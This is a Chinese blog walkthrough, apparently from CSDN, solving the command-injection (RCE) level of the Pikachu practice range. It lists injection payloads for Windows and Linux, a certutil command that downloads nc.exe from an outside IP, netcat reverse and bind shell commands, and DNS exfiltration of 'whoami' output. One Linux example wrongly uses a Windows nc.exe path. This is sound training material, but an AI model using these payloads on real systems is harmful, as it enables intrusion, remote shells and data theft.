Pikachu之RCE全解:Windows与Linux系统网站的rce~payload~

已于 2024-07-23 11:23:48 修改
阅读量352 收藏 8
点赞数 6
分类专栏: 网络空间安全 文章标签: 笔记 其他 安全架构 安全威胁分析 网络攻击模型 web安全 安全
于 2024-07-15 00:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/140309807
版权

文章目录


Pikachu靶场是一个极具挑战性的网络安全练习平台,其中的远程代码执行(RCE)漏洞更是许多初学者学习和掌握的重要课题。本文将针对Pikachu靶场中的RCE漏洞,分别介绍在Windows和Linux服务器上的rce详细解决方案。

在Windows服务器上,通过ping命令执行命令时可能会出现乱码问题。针对这一问题,可以参考以下解决方案:pikachu中RCE出现乱码的解决的方案_pikachu rce乱码-CSDN博客

服务器为Windows系统的Pikachu网站

解法一:payload

127.0.0.1 && dir
127.0.0.1 & dir
127.0.0.1 | dir
127 || dir

在这里插入图片描述

解法二:通过上传nc来执行命令

127.0.0.1 & certutil.exe -urlcache -split -f http://43.139.186.80:80/nc.exe c://nc.exe

解法二.1:攻击者监听,网站主动连接给出shell

网站:
127.0.0.1 & c://nc.exe -e cmd 192.168.196.181 5566
攻击者:
nc -lvvp 5566

解法二.2:网站监听并给出shell,攻击者连接

网站:
127.0.0.1 & c://nc.exe -e cmd -lvvp 5566
攻击者:
nc 192.168.88.136 5566

在这里插入图片描述

解法三:利用dns外带平台解决无回显问题

powershell $x=whoami;$x=$x.replace('\','xxx');$y='.外连dns域名;$z=$x+$y;ping $z
去掉反斜杠的是因为结果带有“\”会导致ping命令无法执行

在这里插入图片描述

服务器为linux系统的pikachu网站

解法一:payload:

127.0.0.1 && dir
127.0.0.1 & dir
127.0.0.1 | dir
127 || dir
`whoami`
;whoami

在这里插入图片描述

解法二:利用dns外带平台解决无回显问题

`whoami`.域名

在这里插入图片描述

解法三:使用nc执行任意命令

解法三.1:攻击者监听,网站主动连接给出shell

网站:
127.0.0.1 & nc -e /bin/bash 192.168.196.181 5566
攻击者:
nc -lvvp 5566

解法三.2:网站监听并给出shell,攻击者连接

网站:
127.0.0.1 & c://nc.exe -e /bin/bash -lvvp 5566
攻击者:
nc 192.168.88.136 5566

总结

通过以上方法,可以有效地在Windows和Linux服务器上解决Pikachu靶场中的RCE漏洞问题。

对于初学者来说,掌握这些方法不仅能提高漏洞利用的技能,还能加深对系统命令执行原理的理解。

希望本文能对你在Pikachu靶场中的RCE漏洞挑战有所帮助。如果你有任何问题或需要进一步的帮助,请随时联系我。

CongSec
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu:一个小皮卡丘的网站
03-15
综上所述,“pikachu:一个小皮卡丘的网站”项目可能是一个以HTML为基础,结合CSS和JavaScript构建的动态网站,其中“pikachu-main”目录下包含了所有必要的源代码和资源文件。通过深入研究这个项目,我们可以学习到...
Pikachu靶场之RCE漏洞详解
m0_46467017的博客
05-18 6341
Pikachu靶场之RCE漏洞详解漏洞简述诚意推荐靶场闯关第1关 exec “ping”源码分析:第2关 exec "eval"源码分析 漏洞简述 一、什么是RCERCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地
Pikachu-RCE
baynk的博客
11-19 1268
0x00 RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入...
pikachu-RCE
最新发布
ZhuoLLLLLL的博客
12-28 663
因为这个命令不但windowslinux系统都支持(windows xp不默认支持,可安装),而且显示的内容不同,不但可以用来判断是否有远程命令执行漏洞,还可以用来判断操作系统linux系统中显示当前执行操作的用户名,windows系统中显示当前登录的域名和用户名)如果设计者在此输入界面的功能上没有做严格的安全控制,攻击者就可以通过此接口注入恶意的命令,让后台执行,从而控制整个后台服务器。成功连接就能进入对方电脑的后台了,可以看到对方的所有文件,攻击成功!命令执行一般发生在远程,故被称为远程命令执行。
远程命令、代码执行RCE漏洞
weixin_43858799的博客
05-13 4301
一、RCE介绍: RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
pikachu-volleyball:通过对原始游戏进行逆向工程将Pikachu排球实现为JavaScript
04-14
皮卡丘排球(対戦ぴかちゅ〜ビ ー チ バ レ ー编)是由“(C)SACHI SOFT / SAWAYAKAN Programmers”和“(C)Satoshi Takenouchi”在1997年开发的一种旧版Windows游戏。此库的源代码是通过反向获取的设计原始...
pikachu-interpreter:神秘的编程语言“皮卡丘”的解释器
05-09
$ python -m pikachu {PikachuFileName} 您还可以指定要预加载到主堆栈上的n个整数(名为pi pikachu )。 使用以下语法,其中[args]表示以空格分隔的整数列表。 $ python -m pikachu {PikachuFileName} [args]
pikachuRCE
qq_43665434的博客
02-12 966
pikachuRCE 一、神魔是RCERCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“
PikachuRCE实验
莫黎小天
05-26 550
一、exec“ping” 在输入框输入8.8.8.8,发现可以ping通 1.ip+|+命令 1)在输入127.0.0.1 | whoami命令,执行如下:得到设备名称以及用户名称 2)输入127.0.0.1 |systeminifo,可以爆出更多的关于主机的信息 2.ip+&+命令(与上面类似) 127.0.0.1 & whoami既可以输出是否ping通也可以显示设备名称及用户名称 二、exec“evel”实验 查看源代码 需要获得一个不报错的值,才能执行html 拿最简单的p
Pikachu系列——RCE
Zlirving_的博客
05-17 615
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验三 —— CSRF RCE概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统RCE分为两种 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测
pikachu靶场RCE
Yb_140的博客
11-14 3030
RCE概述(来自pikachuRCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 一.输出ip并查看当前目录 输入127.0.0.1,发现 再输入127.0.0.1&&dir 二.执行 直接执行phpinfo(); ...
pikachu靶场 rce
10-20
Pikachu靶场是一个带有漏洞的Web应用系统,其中包含了常见的web安全漏洞,如RCE(远程命令/代码执行)。在Pikachu靶场中,后台命令代码类似于shell_exec(‘ping -C 4’.$ip),造成了RCE远程系统命令执行。攻击者可以通过利用该漏洞,执行任意系统命令,从而获取系统权限。因此,对于Pikachu靶场的安全测试,需要特别注意该漏洞的防范和修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值